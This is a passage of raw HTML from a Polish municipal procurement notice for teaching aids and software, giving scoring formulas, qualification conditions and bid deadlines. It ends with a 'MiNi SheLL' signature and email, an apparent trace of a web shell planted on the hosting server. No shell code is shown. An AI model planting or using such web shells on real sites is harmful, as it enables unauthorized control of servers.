class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 6, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60 %,<br/>	Gwarancja – 40 %.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznawane w ramach kryterium „Gwarancja” (G) zostaną przyznane według wzoru:<br/>G=G_z/G_max ×40pkt<br/>gdzie:<br/>G – liczba punktów, którą uzyskała badana oferta w kryterium „Gwarancja”,<br/>Gz – okres gwarancji zadeklarowany w ocenianej ofercie,<br/>Gmax – najdłuższy możliwy okres gwarancji (60 miesięcy).<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>UWAGA:<br/>	Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego: 24 miesięcy.<br/>	Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 60 miesięcy.<br/>	Wykonawca może zaproponować okres gwarancji w przedziale od 24 do 60 miesięcy. Zaoferowany przez Wykonawcę okres gwarancji zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy okres gwarancji (60 miesięcy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje najmniej korzystny okres gwarancji (24 miesiące) - otrzymuje 0 pkt.<br/>	W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, to przy ocenie oferty brany będzie pod uwagę najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert – 60 miesięcy.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (G) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 6 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+ G<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	G – liczba punktów uzyskanych w ramach kryterium „Gwarancja”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki w zakresie zdolności technicznej lub zawodowej :<br/>a)	dla Części 1 Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej:<br/>a.	dwie dostawy kompletów materiałów dydaktycznych dla uczniów publicznych szkół podstawowych, rozwijających kompetencje społeczno-emocjonalne, zawierających technologię interaktywną (mówiącą) z zadrukowanymi kodami optycznymi wraz z dostarczeniem urządzeń do odczytywania kodów mówiących dla co najmniej 100 uczniów w każdym zamówieniu; dostawy zrealizowane w ramach projektów unijnych z EFS/RPO;<br/>b.	dwie dostawy scenariuszy prowadzenia zajęć z liczbą spotkań co najmniej 30 każda, rozwijających kompetencje społeczno-emocjonalne; dla nauczycieli z publicznych szkół podstawowych; dostawy zrealizowane w ramach projektów unijnych z EFS/RPO<br/>c.	dwukrotnie przeprowadził szkolenia z zakresu rozwoju kompetencji społeczno- emocjonalnych dla co najmniej 15 nauczycieli z publicznych szkół podstawowych każde, szkolenia zrealizowane w ramach projektów unijnych z EFS/RPO; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenia Wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ.<br/> b)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz dostaw/usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których te dostawy/usługi zostały wykonane, oraz z załączeniem dowodów określających, czy te dostawy/usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy/usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 5 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w art. 125 ust.1 ustawy Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają sporządzenia aneksu w formie pisemnej, pod rygorem nieważności. <br/>2.	Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość wprowadzenia zmian postanowień niniejszej umowy w stosunku do treści złożonej oferty, w przypadkach opisanych w niniejszym paragrafie.<br/>3.	Dopuszczalna jest zmiana terminu wykonania umowy w przypadku: <br/>a.	wystąpienia okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu umowy, bez możliwości usunięcia <br/>lub likwidacji powyższych okoliczności lub zdarzeń, za które nie odpowiada Wykonawca<br/>b.	wystąpienie siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego o charakterze wyjątkowym, które było niemożliwe <br/>do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności. Siłą wyższą̨ nie są̨ w szczególności: deficyt sprzętowy, kadrowy, materiałowy, spory pracownicze, strajki, trudności finansowe ani też kumulacja tych czynników.<br/>4.	Zmiana umowy w zakresie terminów jest dopuszczalna stosownie do okresu trwania przeszkody.<br/>5.	Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Zamawiający przewidział katalog zmian umowy, na które mogą powoływać się strony niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_sedziejowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com